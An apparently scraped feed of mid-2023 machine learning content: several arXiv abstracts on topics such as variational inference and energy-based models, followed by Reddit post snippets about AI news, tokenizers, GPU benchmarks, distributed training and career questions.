    For predictive modeling relying on Bayesian inversion, fully independent, or ``mean-field'', Gaussian distributions are often used as approximate probability density functions in variational inference since the number of variational parameters is twice the number of unknown model parameters. The resulting diagonal covariance structure coupled with unimodal behavior can be too restrictive when dealing with highly non-Gaussian behavior, including multimodality. High-fidelity surrogate posteriors in the form of Gaussian mixtures can capture any distribution to an arbitrary degree of accuracy while maintaining some analytical tractability. Variational inference with Gaussian mixtures with full-covariance structures suffers from a quadratic growth in variational parameters with the number of model parameters. Coupled with the existence of multiple local minima due to nonconvex trends in the loss functions often associated with variational inference, these challenges motivate the need for robust initialization procedures to improve the performance and scalability of variational inference with mixture models. In this work, we propose a method for constructing an initial Gaussian mixture model approximation that can be used to warm-start the iterative solvers for variational inference. The procedure begins with an optimization stage in model parameter space in which local gradient-based optimization, globalized through multistart, is used to determine a set of local maxima, which we take to approximate the mixture component centers. Around each mode, a local Gaussian approximation is constructed via the Laplace method. Finally, the mixture weights are determined through constrained least squares regression. Robustness and scalability are demonstrated using synthetic tests. The methodology is applied to an inversion problem in structural dynamics involving unknown viscous damping coefficients.  ( 3 min )
    Energy Discrepancies: A Score-Independent Loss for Energy-Based Models. (arXiv:2307.06431v1 [stat.ML])
    Energy-based models are a simple yet powerful class of probabilistic models, but their widespread adoption has been limited by the computational burden of training them. We propose a novel loss function called Energy Discrepancy (ED) which does not rely on the computation of scores or expensive Markov chain Monte Carlo. We show that ED approaches the explicit score matching and negative log-likelihood loss under different limits, effectively interpolating between both. Consequently, minimum ED estimation overcomes the problem of nearsightedness encountered in score-based estimation methods, while also enjoying theoretical guarantees. Through numerical experiments, we demonstrate that ED learns low-dimensional data distributions faster and more accurately than explicit score matching or contrastive divergence. For high-dimensional image data, we describe how the manifold hypothesis puts limitations on our approach and demonstrate the effectiveness of energy discrepancy by training the energy-based model as a prior of a variational decoder model.  ( 2 min )
    Tackling Combinatorial Distribution Shift: A Matrix Completion Perspective. (arXiv:2307.06457v1 [cs.LG])
    Obtaining rigorous statistical guarantees for generalization under distribution shift remains an open and active research area. We study a setting we call combinatorial distribution shift, where (a) under the test- and training-distributions, the labels $z$ are determined by pairs of features $(x,y)$, (b) the training distribution has coverage of certain marginal distributions over $x$ and $y$ separately, but (c) the test distribution involves examples from a product distribution over $(x,y)$ that is {not} covered by the training distribution. Focusing on the special case where the labels are given by bilinear embeddings into a Hilbert space $H$: $\mathbb{E}[z \mid x,y ]=\langle f_{\star}(x),g_{\star}(y)\rangle_{{H}}$, we aim to extrapolate to a test distribution domain that is $not$ covered in training, i.e., achieving bilinear combinatorial extrapolation. Our setting generalizes a special case of matrix completion from missing-not-at-random data, for which all existing results require the ground-truth matrices to be either exactly low-rank, or to exhibit very sharp spectral cutoffs. In this work, we develop a series of theoretical results that enable bilinear combinatorial extrapolation under gradual spectral decay as observed in typical high-dimensional data, including novel algorithms, generalization guarantees, and linear-algebraic results. A key tool is a novel perturbation bound for the rank-$k$ singular value decomposition approximations between two matrices that depends on the relative spectral gap rather than the absolute spectral gap, a result that may be of broader independent interest.  ( 2 min )
    On Collaboration in Distributed Parameter Estimation with Resource Constraints. (arXiv:2307.06442v1 [cs.LG])
    We study sensor/agent data collection and collaboration policies for parameter estimation, accounting for resource constraints and correlation between observations collected by distinct sensors/agents. Specifically, we consider a group of sensors/agents each samples from different variables of a multivariate Gaussian distribution and has different estimation objectives, and we formulate a sensor/agent's data collection and collaboration policy design problem as a Fisher information maximization (or Cramer-Rao bound minimization) problem. When the knowledge of correlation between variables is available, we analytically identify two particular scenarios: (1) where the knowledge of the correlation between samples cannot be leveraged for collaborative estimation purposes and (2) where the optimal data collection policy involves investing scarce resources to collaboratively sample and transfer information that is not of immediate interest and whose statistics are already known, with the sole goal of increasing the confidence on the estimate of the parameter of interest. When the knowledge of certain correlation is unavailable but collaboration may still be worthwhile, we propose novel ways to apply multi-armed bandit algorithms to learn the optimal data collection and collaboration policy in our distributed parameter estimation problem and demonstrate that the proposed algorithms, DOUBLE-F, DOUBLE-Z, UCB-F, UCB-Z, are effective through simulations.  ( 2 min )
    Testing Sparsity Assumptions in Bayesian Networks. (arXiv:2307.06406v1 [stat.ML])
    Bayesian network (BN) structure discovery algorithms typically either make assumptions about the sparsity of the true underlying network, or are limited by computational constraints to networks with a small number of variables. While these sparsity assumptions can take various forms, frequently the assumptions focus on an upper bound for the maximum in-degree of the underlying graph $\nabla_G$. Theorem 2 in Duttweiler et. al. (2023) demonstrates that the largest eigenvalue of the normalized inverse covariance matrix ($\Omega$) of a linear BN is a lower bound for $\nabla_G$. Building on this result, this paper provides the asymptotic properties of, and a debiasing procedure for, the sample eigenvalues of $\Omega$, leading to a hypothesis test that may be used to determine if the BN has max in-degree greater than 1. A linear BN structure discovery workflow is suggested in which the investigator uses this hypothesis test to aid in selecting an appropriate structure discovery algorithm. The hypothesis test performance is evaluated through simulations and the workflow is demonstrated on data from a human psoriasis study.  ( 2 min )

  • Open

    NPC Steven acknowledged me finally!! 🤯 ChatGPT driven agents in Unreal Engine - update 3
    submitted by /u/Chance_Confection_37 [link] [comments]  ( 8 min )
    What comes first, AI gf or AI bf?
    Was recently hearing an interview with George Hotz and the question came up, what will be invented first: an AI boyfriend or an AI girlfriend? Obviously he had some opinions, would be curious to hear what others have to say. submitted by /u/geepytee [link] [comments]  ( 8 min )
    Training an AI Copywriter
    I want to train an ai bot to be my copywriting sidekick, so it would help me write stuff in the voice, tone and format that my predecessor used. For this, I would need to feed it our entire webpage, some voice&tone norms, presentations and so on. Could you guys pls help me on how to set this up? I have an OpenAI API key, and they did make gpt4 available to use recently soo.. This should be doable right? Thanks boys submitted by /u/Jacobo_csgo [link] [comments]  ( 8 min )
    “Low-Resource” Text Classification: A Parameter-Free Classification Method with Compressors
    submitted by /u/IngloriousBastion [link] [comments]  ( 8 min )
    Apple is like the quiet guy in the corner watching a bar fight with the big 3; you know he is gonna do something REALLY bad ass, but what?
    Google, OpenAI, and Meta (Facebook or whatever) have been having a free for all, trying to topple each with GPT5, Llama, and Bard. However, Apple has been REALLY quiet on the issue with A.I. , and focused on the release of this overpriced monstrosity, the Apple Vision Pro. It's a really big gamble with the $3500 price tag, but so was the iPhone many moons ago, and now everyone will dump their credit and their bank account for the latest iPhone Version Doodaad. I believe Apple is sidestepping this brawl to focus on perfecting augmented reality. This will ultimately unite the hardware with AR applications, and eventually lead to AI applications being embedded into the Vision Pro bundle. In short, while the Big 3 are playing, "King of the AI Mountain', by pummeling each other to the ground…  ( 9 min )
    Where and how can I best train an Ai to really learn my art style?
    A lot of the ai tools I use just doesn’t quite get what I’m asking it to do, and I’m not sure if I’m even able to train my own considering it’s a borg of everyone else’s work etc. I guess what I’m asking is if there is any tool out there that’s stand alone and not as watered down as a lot of the ones that’s available (most of the time for free)? I have a bunch of images I can feed it, along with examples. If anyone has any tips, suggestions, or work-arounds, please let me know! Much appreciated. submitted by /u/Maelasae [link] [comments]  ( 8 min )
    What is xAI and Why Did Elon Musk Launch It? 2023
    submitted by /u/__boiyah [link] [comments]  ( 8 min )
    AI Art Creator for Animations
    Are there any free art creators yet for doing simple animations? or does anyone have a link to how one would try to do this. TYIA. submitted by /u/Walfy07 [link] [comments]  ( 8 min )
    Is there a way to automatically enter free competitions?
    Is this possible and if so how would I go about this? Thanks for any hell submitted by /u/captainofthememeteam [link] [comments]  ( 8 min )
    China moves to support generative AI, regulate applications
    China's internet watchdog and several other authorities, including the National Development and Reform Commission and the Ministry of Science and Technology, have jointly issued an interim regulation on the management of generative artificial intelligence (AI) services. The regulation, published on the website of the Cyberspace Administration of China (CAC) on Thursday, will go into effect on Aug. 15. submitted by /u/Tiger_Claw_1 [link] [comments]  ( 8 min )
    Looking to get into AI Research
    Hi i am a highschool student in the last year, i am looking to get into ai research with potentially starting off my own research in fututre What kind of further studies should i get into in college for scope of getting a phd It would be really helpful to know what degree's should i pursue in order to start my own research at a point in time (Pardon my poor english.) submitted by /u/ShreeyanxRaina [link] [comments]  ( 8 min )
    AI Won’t Really Kill Us All, Will It? - The Atlantic (transcript and podcast)
    submitted by /u/RADICCHI0 [link] [comments]  ( 8 min )
    How do people actually make money using AI?
    I’ve been seeing a lot of posts regarding people making money off chat, GPT and other software’s. Is it even industry worth getting in to? submitted by /u/Hititfromtheback6969 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/12/2023
    Anthropic, the AI startup co-founded by ex-OpenAI execs, today announced the release of a new text-generating AI model, Claude 2. The successor to Anthropic’s first commercial model, Claude 2 is available in beta starting today in the U.S. and U.K. both on the web and via a paid API.[1] Elon Musk has launched an AI company to challenge ChatGPT creator OpenAI, which the billionaire tech mogul has accused of being “woke”. On Wednesday, xAI said the goal of the new company would be to “understand the true nature of the universe”.[2] Chip designer Nvidia will invest $50 million to speed up training of Recursion’s artificial intelligence models for drug discovery, the companies said on Wednesday, sending the biotech firm’s shares surging about 83%.[3] For decades, morning weather reports have relied on the same kinds of conventional models. Now, weather forecasting is poised to join the ranks of industries revolutionized by artificial intelligence.A pair of papers, published Wednesday in the scientific journal Nature, touts the potential of two new AI forecasting approaches — systems that could yield faster and more accurate results than traditional models, researchers say.[4] Sources: [1] https://techcrunch.com/2023/07/11/anthropic-releases-claude-2-the-second-generation-of-its-ai-chatbot/ [2] https://www.aljazeera.com/economy/2023/7/13/musk-launches-artificial-intelligence-rival-to-chatgpts-openai [3] https://www.reuters.com/technology/nvidia-invests-50-mln-recursion-train-ai-models-drug-discovery-2023-07-12/ [4] https://www.scientificamerican.com/article/climate-change-could-stump-ai-weather-prediction/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Best way to start learning?
    Where is the best place/way to start learning openai/ai? are there good tutorials? learning about how to train a model? Would something else be better to start with? submitted by /u/jeffsmith202 [link] [comments]  ( 8 min )
    Project StyleScribble - generate text with your writing voice
    Wanted to share my new AI project: StyleScribble is an AI-powered web tool designed to assist content creators in generating text using their own unique writing voices. By leveraging the power of artificial intelligence, this tool revolutionizes the content creation process and empowers users to effortlessly produce high-quality written content. ​ https://preview.redd.it/4670phrcjmbb1.png?width=448&format=png&auto=webp&s=bb93bf358bf917e49668262a7e0a2ee7a2aa5ba2 Link to demo: https://huggingface.co/spaces/daniellefranca96/styles-scribble-demo Link to sign in on waitlist: https://stylescribble.fly.dev submitted by /u/katerinaptrv12 [link] [comments]  ( 8 min )
    Best FREE Chrome Extension for reusing prompts other than PromptDrive.ai?
    This is the best I can find so far but before I start investing a lot of time into uploading prompts to this tool, I wanted to make sure this was the best on the market. AIPRM is great for pre-done prompts but limits private prompts. Appreciate any help! submitted by /u/Life-Hacking [link] [comments]  ( 8 min )
    Best tool/system for keeping up and organizing AI tools... Notion, Clickup or...?
    I'm sure this comes down to preference but before I start spending a ton of time building this out, I wanted some feedback on what others have found that worked best? Clickup Example: https://doc.clickup.com/37456139/d/h/13q28b-364/176f834177eb5cb Notion Example: https://enchanting-trader-463.notion.site/AI-Database-f917ca2e609b45478fe7bc2c8d544877 Long time Evernote & G docs user but neither of these is cutting it. submitted by /u/Life-Hacking [link] [comments]  ( 8 min )
  • Open

    [P] Colab - Generate JSON Dataset and Evaluate LLMs
    Here's a free colab notebook that I've been playing around with to generate JSON datasets from PDFs for fine-tuning LLMs and evaluate outputs/prompts for Toxicity, Bias, Quality etc. Colab: https://colab.research.google.com/drive/1KCn1HIeD3fQy8ecT74yHa3xgJZvdNvqL?usp=sharing GitHub Repo: https://github.com/kw2828/guardrail-ml submitted by /u/Educational_Grass_38 [link] [comments]  ( 8 min )
    [D] Looking to enroll in a MS in AI/ML
    I’m looking into getting my MS in ML soon and I’m not sure if the market is good, some friends and family are telling me its too saturated and you won’t find a job and others are telling me you still need leetcode to get a job and others tell me the job market is extremely competitive and you likely wont get a job. Im worried that im making a mistake. Here are some facts about me: 1. I currently am working in a company where I have 5 rotations every 9 months, 3 of them which will be AI/ML related, which means I’ll definitely have at least 3 projects in hand on a global scale (company is global) By the time im done with the MS, I’ll probably already have 2-3 years of hands on experience. Thats about it. Should I be worried? Please advise me, Thank you submitted by /u/KManYuksi [link] [comments]  ( 9 min )
    [D] ICCV Reviews are NOT out
    zzz submitted by /u/Towzeur [link] [comments]  ( 8 min )
    [D] Ray vs. AWS Batch for Distributed Training
    Hello all, In our organization, we are currently using Metaflow as our managed training infrastructure and leveraging the `@batch` decorator for compute. Using Batch, we also have access to multi-node parallel jobs (`@parallel` decorator) for distributed training and we've used it to great effect for fine-tuning some LLMs. We are now thinking of adopting Ray Train since it seems to be very popular nowadays and is gaining lots of traction. Wondering how Ray Train compares to Metaflow (AWS Batch) and what the pros/cons are for both, particularly in the context of scalable training of models. Please kindly share any insights. Thanks in advance! submitted by /u/rirhun [link] [comments]  ( 8 min )
    Is the following an valid way to combine models? [D]
    I am a physician conducting research on intensive care data from many patients. I have full ethical approval, this is just exploratory, nobody will be treated based on my results, and I have no statistician. I have a question in principal, rather than looking for a specific solution. I have trained and tuned three models on my (very imperfect) data. They make binary predictions about the likely success of a treatment. I have developed a logistic regression model, a gaussian naive bayes model, and a c5.0 decision tree model. Each is imperfect in its own way. AUC for each is 0.72-0.79. I am wondering if I could ask each model to make predictions on a set of test data, and let the models 'vote'. For example, if 2 of 3 models agree, then I create a 'majority opinion' column on my data and go with that result. I figure it might weed out some weakness. Is this a 'valid' way to do this, or is it pure nonsense in the world of machine learning? submitted by /u/e05bf027 [link] [comments]  ( 9 min )
    [D] Text analysis alternative to LIWC?
    I'm working on a social science project and have a lot of text data that I would like to analyse between certain groups. Most of the papers that I've read on this use LIWC, but I unfortunately don't have access to that. An alternative I've found was the python package empath but it doesn't account for the use of pronouns which I know is going to be an important feature here. Does anyone know of a better alternative? Thanks a lot! submitted by /u/PlainJane049 [link] [comments]  ( 8 min )
    [R] Nvidia RTX 4090 ML benchmarks. Under QEMU/KVM. Image + Transformers. FP16/FP32.
    Motivation: I am running a proxmox instance for tinkering with devops stuff, k8s, ci and so on. And wanted to also have the ability to run ML workloads specifically any kind of ClosedAI open-sourced alternatives. Like Guanaco, WizardLM, Starcoder, Codegen. As well as having some kind of pre-prod environment for ML deployments. Environment: All the tests were run within a virtual machine(qemu) which is run using proxmox 7.4-3. CPU: Intel Xeon 2696v4 2.2Ghz Storage: Samsung SSD 870 EVO OS:Linux gpu-node 5.15.0-76-generic #83-Ubuntu SMP Thu Jun 15 19:16:32 UTC 2023 x86\_64 x86\_64 x86\_64 GNU/LinuxDISTRIB\_DESCRIPTION="Ubuntu 22.04.2 LTS" Python 3.10.12 (main, Jul 5 2023, 18:54:27) \[GCC 11.2.0\] on linux Torch version: Version: 2.1.0.dev20230709+cu121 import torch;torch.version.cuda -> …  ( 9 min )
    [D] Stats package (JMP) vs machine learning for prediction
    CIO wants to predict "things" about mortgages using "technology". (There have been a few specifics and possible factors suggested, like if a loan was returned to us by the bank we sold it to). IT manager is super gung ho about using machine learning and AI. I'm not an experienced statistician, but I used JMP when I worked as a process engineer (yeah, squiggly career), and was like, why can't we just do this with JMP? I can figure out which factors are significant and which are most strongly correlated to what they want answers to. Is there a valid reason to go the machine learning route, or is it just a hot topic right now? No one seems willing to point out any flaws with that method and that makes me uncomfortable. submitted by /u/clarielz [link] [comments]  ( 9 min )
    TokenMonster Ungreedy Subword Tokenizer V4: Enables Models to be 4x Smaller and Whilst Achieving Higher Chr/Token (With Evidence) [P]
    GitHub | Interactive Benchmark | Live Tokenizer TokenMonster is an ungreedy subword tokenizer and vocabulary trainer for Python, Go & Javascript. You can use one of my pretrained vocabularies or generate your own with the included tools. TokenMonster can tokenize text more efficiently than other tokenization methods, even when using a much smaller vocabulary. Here is a size 24000 TokenMonster vocabulary benchmarked against tiktoken cl100k_base (100256) and LLaMa (32000) (link to interactive benchmark): https://preview.redd.it/o16a9tbrurbb1.png?width=1506&format=png&auto=webp&s=66c11d2b8defd634c86756064125b70e8e5cb6d6 Unlike previously versions of TokenMonster, the current version does not compress the text into as few tokens as possible to achieve the high chr/token. TokenMonster V4 of…  ( 9 min )
    [P] INT-FP-QSim: Mixed Precision and Formats For Large Language Models and Vision Transformers
    Hello, We've released INT-FP-QSim: https://github.com/lightmatter-ai/INT-FP-QSim, a flexible simulator that allows running different LLMs and vision transformers at different formats (INT, FP) and precision (8-bit, 4-bit). The repository also has scripts for running simple evaluation with Stable Diffusion, Maskformer, Graphormer, ImageBind and CodeGen (with and without the simulator). Since there are users who may not have a good starting point for running different models, we hope that the example scripts provided in this repository will help there as well. submitted by /u/IllustriousSir_007 [link] [comments]  ( 8 min )
    [P] Federated Learning framework
    Hello everyone 👋 We have launched a new project called MetisFL, a federated learning framework that allows developers to federate their machine learning workflows and train their models across distributed datasets without having to collect the data in a centralized location. https://github.com/NevronAI/metisfl Every feedback or even a simple star, would be highly appreciated! submitted by /u/No-Literature-1930 [link] [comments]  ( 8 min )
    [P] Curated Transformers: Library of PyTorch LLM and other transformers, with common components
    https://github.com/explosion/curated-transformers/ Curated Transformers is a new library of PyTorch LLM and other transformer architectures, implemented using common components. The library makes a different trade-off from Huggingface Transformers, which uses wholly separate implementations for each architecture. The advantage of HF's approach is that they can adopt new architectures very quickly, by taking the academic implementation more or less verbatim. Curated Transformers won't be able to add architectures as quickly, but the implementations share common elements, making it easier to mix and match components and see how architectures differ. We'll also be able to share bug fixes and improvements between different models. Check it out if you're interested in mixing and matching parts of different models, or if you just want a lighter-weight, pure-PyTorch experience, without any intervening abstractions. Supported encoder-only models: ALBERT BERT CamemBERT RoBERTa XLM-RoBERTa Supported decoder-only models: GPT-NeoX LLaMA Falcon Generator wrappers: Dolly v2 Falcon All models can be loaded from Huggingface Hub. spaCy integration for curated transformers is provided by the spacy-curated-transformers package. submitted by /u/syllogism_ [link] [comments]  ( 9 min )
    [R] PyTorch DeepLab/MMSegmentation Tutorial Resources
    I've hit a bit of a roadblock. I'm struggling to find tutorials with PyTorch code for Semantic Segmentation. I initially used the MMSegmentation tutorial on its GitHub, but that didn't work as there were a number of missing files. Any help would be massively appreciated as I'm really struggling. submitted by /u/Charako [link] [comments]  ( 8 min )
    [Research] incorporating additional information into the latent space of CNN's?
    Context: The input is a 3D MRI image, aswell as a position and orientation both in 3D. Output is a 3D image Most likely candidate for architecture is 3D-Unet In general we are trying to predict how a brain will be stimulated based a magnet producing an electric field. The position and orientation I am talking about is the position and orientation of the magnet. If you are interested this paper works on the same problem: doi.org/10.1371/journal.pone.0254588 Question: How do we incoorperate multiple different input types (image + vectors) in CNN's We know the position and orientation information is extreemly relevant to the output, meaning we know it can be incoorperated directly into the latentspace, what I dont understand is how to incoorperate the two vectors into the latentspace in order to keep the feature dimentions. I can think of two options: 1) add additional feature layers to the latentspace in which every layer has one value as constant accross the entire layer, that way if we have 2 vectors and a angle we would add 7 feature layers to the latent space. Here I am not sure if the neural network can work with these since they only really have any meaning if you put them together into a vector 2) completely flatten the latent space add the values and then reshape them back into form. Here i doubt this is a good idea since we are destroying all localization information from the features Previous approach: One solution we have thought about is feeding the neural net the mri image as if it was taken from the position, orientation and angle that way incoorperating the information indirectly. This solution preduces the most accurate results in previous papers. Unfortunatly that solution leads to a too long preprocessing time and since we need the inference to be real time it is not a valid solution. submitted by /u/ClumsyClassifier [link] [comments]  ( 9 min )
    [P] Journal Hub - literature discussion platform project
    [ Removed by Reddit on account of violating the content policy. ] submitted by /u/iokarkan [link] [comments]  ( 8 min )
    [R] Deep Learning Models for Forest Canopy Estimation
    I need to either build a tool or use a service which can convert satellite image (Input) of trees, and then output an estimate of its forest canopy. Has anyone ever used or know of such deep learning models? Thanks. submitted by /u/Quantumercifier [link] [comments]  ( 8 min )
    [D] Overview of recent developments in audio-generative models (TTS & TTM)
    Hi everyone, I wrote a blog post on the advancements in Generative AI for audio, focusing on Text-to-Speech (TTS) and Text-to-Music (TTM) models. I survey how techniques from LLMs have been adapted for audio generation, leading to significant improvements. The article takes a technical look at some of the recent models in this space, including MusicLM, VALL-E, and also explains the key ideas behind Neural Audio Codecs and Residual Vector Quantization techniques, which have become essential in nearly all text-to-audio models. If you have an interest in the current state and future of Generative AI for audio, I hope you will find this informative! I drop the article link in the comments below 👇👇👇 I appreciate any feedback or thoughts you may have! submitted by /u/mrx-ai [link] [comments]  ( 9 min )
    [P] Fast debugging of audio machine learning models
    I recently have improved a library I created to have support for finding issues in audio data using audio embeddings. ​ A mix of automatically detecting problematic data clusters and reviewing them visually can help speed up model debugging. The principle behind this is as follows: Step 1: Compute audio embeddings for the raw data 🎶This makes the data explorable by audio similarity. Depending on the properties the model captures, you will get different notions of similarity. E.g., if you use a model for speaker identification, you will probably order your data according to the speaker's voice properties. Step 2: Identify problematic data slices using clustering 🔍One strategy to get explicit suggestions for problematic data slices is clustering the samples based on audio embeddings. You can then compute your evaluation metrics for the identified clusters and search for clusters that, compared to the overall accuracy, show a significant accuracy drop. Step 3: Review the supposed issues visually 👀Especially when using only unstructured data, the results of your analysis will not be readily interpretable. However, reviewing the problematic clusters by listening and visualizing (e.g., drawing spectrograms) will help you filter out actual model and data issues. I also created a Medium Post and an Example Notebook for this. Also check out this Interactive Result Visualization on Huggingface. ​ ​ ​ submitted by /u/OkResearch6289 [link] [comments]  ( 9 min )
    [D] Overfit ML model
    Hello this is my first contribution to the sub, I have a dataset for a classification problem and it seems that all the models I have performed are overfiting (f1 score close to 1). I cant wrap my head around how to solve it without removing important values. submitted by /u/Archyve [link] [comments]  ( 8 min )
    [D] how to accelerate ViT models more faster
    I have conducted experiments and examples on accelerating ViT (Vision Transformer) using methods such as TensorRT, FasterTransformer, and xFormers. The experiments were conducted using a single A100 as a baseline. - https://github.com/bnabis93/vision-language-examples/tree/main/acceleration In xFormers, I tried applying sparse attention and memory-efficient attention to ViT, but there was an issue where the speed actually decreased. Therefore, I excluded those results. Generally, just performing TensorRT conversion significantly improves latency. In the case of faster transformer, optimized kernels are not provided in fp32, so it is not as effective as expected. However, after quantizing to fp16 and obtaining the results, it was more effective than simply performing TensorRT conversion. Are there any other methods for accelerating ViT? Using OpenAI's Triton is one option that comes to mind. If you have any other methods worth trying, I would appreciate it if you could let me know. submitted by /u/bono-93 [link] [comments]  ( 9 min )
    [P] LLMs, NLP: Building a Model to Generate and Analyze Claim Narratives
    Hi all. I'm diving into the world of Natural Language Processing (NLP) and Large Language Models (LLMs), and I could really use some assistance with my project. Here's what I'm aiming to achieve: Imagine having a dataset with various features such as location, type of claim, and claim payment. Additionally, there's a column dedicated to narratives, which provide descriptions of each claim. For instance, a narrative could be "I was crossing the street and was hit by a car, which broke my leg." My goals are twofold: i) Develop a model capable of taking the three columns (type of claim, claim payment, and location) as input and generating a narrative. ii) Create another model that does the reverse: input a narrative and extract relevant information like the type of claim and the location. I would greatly appreciate any advice, or resources you can provide. Thank you in advance! submitted by /u/therobot20 [link] [comments]  ( 9 min )
    [D]Encoder only vs encoder-decoder vs decoder only
    I understand that encoder only models (like BERT etc) are mainly for learning representations of words taking context on both sides. What I’m confused about is why you would need decoder only vs encoder-decoder models. GPT and Bloom are decoder only while I think T5 is enc-dec, I’m not sure why you would use one vs the other. Intuitively enc-dec model has more parameters and should be better at tasks where you have both complex text input and output, like say translation or summarization. Any ideas why decoder only models are desirable and also why they seem to work so well? Thanks in advance. submitted by /u/Western-Image7125 [link] [comments]  ( 8 min )
  • Open

    "Reinforcement Learning in Newcomblike Environments", Bell et al 2021
    submitted by /u/gwern [link] [comments]  ( 8 min )
    REINFORCE with Baseline not Learning
    I have implemented REINFORCE using PyTorch and am testing it on the CartPole environment. My implementation allows for an optional baseline to be applied. At present, the baseline used is simply the mean of the returns earned during a trajectory. The agent will learn a good policy when I DO NOT use a baseline, but when I apply the baseline, the agent fails to learn anything. I cannot figure out why. I notice that the loss is always very close to zero when using the baseline, but it seems like that should be expected. When the network weights are still random, most of the actions will have a probability that is near 0.5, and thus a log probability that is close to log(0.5) ~=~ -0.7. The returns for this environment are symmetric about the mean, so the weighted sum of the centered return…  ( 9 min )
    Beating DeepMind’s Game: Alchemy
    submitted by /u/Ok_Introduction9109 [link] [comments]  ( 8 min )
    Is offline-to-online RL some kind of Transfer-RL?
    I read some papers about offline-to-online (O2O) RL and transfer-RL. And I was trying to explore the O2O-transfer RL. Where we have data for one environment and we could pre-train a model offline then improve it online in another environment. If the MDP structure is the same for the target and source environments while transferring. What is the exact difference between O2O-RL and transfer-RL under this assumption? Essentially they are both trying to adapt the distribution drift, isn’t it? submitted by /u/Blasphemer666 [link] [comments]  ( 8 min )
    PPO agent completing Street Fighter III on our RL Platform, it consistently outperformed when using deterministic actions instead of sampling them proportionally to their probability. Why in your opinion? (see comment for details)
    submitted by /u/DIAMBRA_AIArena [link] [comments]  ( 8 min )
  • Open

    Symbol tuning improves in-context learning in language models
    Posted by Jerry Wei, Student Researcher, and Denny Zhou, Principal Scientist, Google Research A key feature of human intelligence is that humans can learn to perform new tasks by reasoning using only a few examples. Scaling up language models has unlocked a range of new applications and paradigms in machine learning, including the ability to perform challenging reasoning tasks via in-context learning. Language models, however, are still sensitive to the way that prompts are given, indicating that they are not reasoning in a robust manner. For instance, language models often require heavy prompt engineering or phrasing tasks as instructions, and they exhibit unexpected behaviors such as performance on tasks being unaffected even when shown incorrect labels. In “Symbol tuning improves…  ( 93 min )
  • Open

    Data modeling techniques in modern data warehouse
    Hello, data enthusiast! In this article let’s discuss “Data Modelling” right from the traditional and classical ways and aligning to today’s digital way, especially for analytics and advanced analytics. Yes! Of course, last 40+ years we all worked for OLTP, and followed by we started focusing on OLAP. After cloud ear come into the picture… Read More »Data modeling techniques in modern data warehouse The post Data modeling techniques in modern data warehouse appeared first on Data Science Central.  ( 26 min )
    A Detailed Guide for Data Handling Techniques in Data Science
    Image Source: Author Introduction Data Engineers and Data Scientists need data for their Day-to-Day job. Of course, It could be for Data Analytics, Data Prediction, Data Mining, Building Machine Learning Models Etc., All these are taken care of by the respective team members and they need to work towards identifying relevant data sources, and associated with… Read More »A Detailed Guide for Data Handling Techniques in Data Science The post A Detailed Guide for Data Handling Techniques in Data Science appeared first on Data Science Central.  ( 26 min )
  • Open

    training convolutional neural network with MATLAB: image recognition AI.
    submitted by /u/Character_Ad_1385 [link] [comments]  ( 8 min )
  • Open

    Effectively solve distributed training convergence issues with Amazon SageMaker Hyperband Automatic Model Tuning
    Recent years have shown amazing growth in deep learning neural networks (DNNs). This growth can be seen in more accurate models and even opening new possibilities with generative AI: large language models (LLMs) that synthesize natural language, text-to-image generators, and more. These increased capabilities of DNNs come with the cost of having massive models that […]  ( 11 min )
  • Open

    AI-Fueled Productivity: Generative AI Opens New Era of Efficiency Across Industries
    A watershed moment on Nov. 22, 2022, was mostly virtual, yet it shook the foundations of nearly every industry on the planet. On that day, OpenAI released ChatGPT, the most advanced artificial intelligence chatbot ever developed. This set off demand for generative AI applications that help businesses become more efficient, from providing consumers with answers Read article >  ( 11 min )
    Full-Scale Gaming: ‘Dragon’s Dogma: Dark Arisen’ Comes to GeForce NOW
    Arise, members! Capcom’s legendary role-playing game Dragon’s Dogma: Dark Arisen joins the GeForce NOW library today. The RPG and THQ Nordic’s Jagged Alliance 3 are newly supported on GeForce NOW, playable on nearly any device. From Dusk Till Pawn Become the Arisen and take up the challenge in Capcom’s critically acclaimed RPG. Set in a Read article >  ( 5 min )
  • Open

    Making sense of all things data
    Abel Sanchez helps industries and executives shift their operations in order to make sense of their data and use it to help their bottom lines.  ( 8 min )
    How an “AI-tocracy” emerges
    In China, the use of AI-driven facial recognition helps the regime repress dissent while enhancing the technology, researchers report.  ( 9 min )

  • Open

    [D] Does the university/program for masters for ML/AI roles matter?
    I am curious about this. I have an undergrad in CS from a large public university from the states and 2 yoe as SWE from India. Not now, but few more years down the line when I have like 4-5 yoe as SWE, I would want to get into ML/AI roles. I don't want to waste any more time getting into a full-time program and waste 1-2 more years of my 20s (I am 25 already) so I was looking for online programs from a >= decent university in North America. The thing about me is that I learn best by self-studying. For me personally, university prestige doesn't do anything for me cos they all read from ppts and use same books. I took a summer at Cornell and ended up studying on my own. So, for me to spend so much money or take out another 1-2 years for a full-time masters doesn't make sense. I just want get a masters that is cheap in terms of cost, takes comparatively less time, PT so that I can work at the same time and do powerlifting and other hobbies and after completion can make me eligible for non-research ML/AI roles. In all, I am only doing this to show on my resume to HR that "here is a guy who you won't need to spend too much time on analyzing cos he has done a masters/ some more additional math/stat courses and an institution has certified because they got paid to do so". submitted by /u/ItsWasntMyFault [link] [comments]  ( 9 min )
    [D] AI Text to Image Generation Project
    I am a student of computer science. I have my final year project whose deadline is in a few week. I have to create AI text to image generator trained on a custom data set. The user should provide it a prompt and it should generate an image based on the prompt given to it. Infact it will be limited as it will be trained on a limited cutom data set. I have searched throughout the internet but I am unable to find any helpful material, code or any resource... And those that I found I am unable to understand them because of my less expertise. Is there anyone who could help me ? submitted by /u/mufeezahmad [link] [comments]  ( 8 min )
    [D] How to do Semi Supervised Learning or Learning with no labels?
    Would appreciate some direction and pointers in this research area. Some possible options could be to use representational learning (probably using auto encoder, or InfoNCE/Contrastive loss). Is there any other good way to solve the problem of semi supervised learning where we have partial labels for the data and want our model to do well on unlabelled instances as well? submitted by /u/Rohit901 [link] [comments]  ( 8 min )
    [P] Free and Fast LLM Finetuning
